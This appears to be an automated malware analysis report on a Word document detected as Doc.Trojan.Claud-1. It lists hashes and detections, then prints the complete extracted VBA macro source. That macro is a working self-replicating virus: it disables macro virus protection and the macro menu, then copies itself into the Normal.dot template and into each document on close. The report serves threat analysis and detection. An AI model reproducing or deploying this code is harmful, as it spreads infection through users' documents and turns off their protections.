Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c95d63fd080a8e2…

MALICIOUS

Office (OLE)

786.0 KB Created: 2005-08-31 13:53:00 Authoring application: Microsoft Word 11.1 First seen: 2018-06-21
MD5: d8954bf0eb4c329cba4f3f9d5ad8b6cd SHA-1: a08e8297b6820de55ca838620b344a6f8463d654 SHA-256: 2c95d63fd080a8e2cb339f534f18593dc31e9058014abdb5086b63e8dca72bfd
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical ClamAV heuristic indicates this is a malicious document, specifically identified as Doc.Trojan.Claud-1. The VBA macro code within the 'macros.bas' script attempts to infect the Normal.dot template, which is a common persistence mechanism for macro-based malware. This allows the malicious macro to be present in all new documents created by the user.

Heuristics 2

  • ClamAV: Doc.Trojan.Claud-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Claud-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1853 bytes
SHA-256: 0917b9cf0555e93e64d25cfe6b0cf8e180143596c972f55900209eaadd2f3678
Detection
ClamAV: Doc.Trojan.Claud-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Claudio2"
Attribute VB_Base = "1Normal.Claudio2"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
On Error Resume Next
Dim jota As Integer, i As Integer, y As Integer, cadecodi As String
 Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
 Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
  CommandBars("tools").Controls("macro").Enabled = False
  Options.VirusProtection = False
  y = 0
  If AD.Name = "Claudio2" Then GoTo InfectNormal
  i = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
Claudio:
  jota = 0
  jota = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < NT.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = NT.CodeModule.Lines(jota, 1)
     AD.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   AD.Name = "Claudio2"
   ActiveDocument.SaveAs ActiveDocument.FullName
  Else
    AD.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo Claudio
  End If
 GoTo IYGH
InfectNormal:
If NT.Name <> "Claudio2" Then
i = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
jota = 0
jota = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < AD.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = AD.CodeModule.Lines(jota, 1)
     NT.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   NT.Name = "Claudio2"
   NormalTemplate.Save
  Else
    NT.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo InfectNormal
  End If
 End If
IYGH:
'Este es un V macro, Elaborado por c l a u d I o
'Este es el Comienzo de la era de los V Claudio
End Sub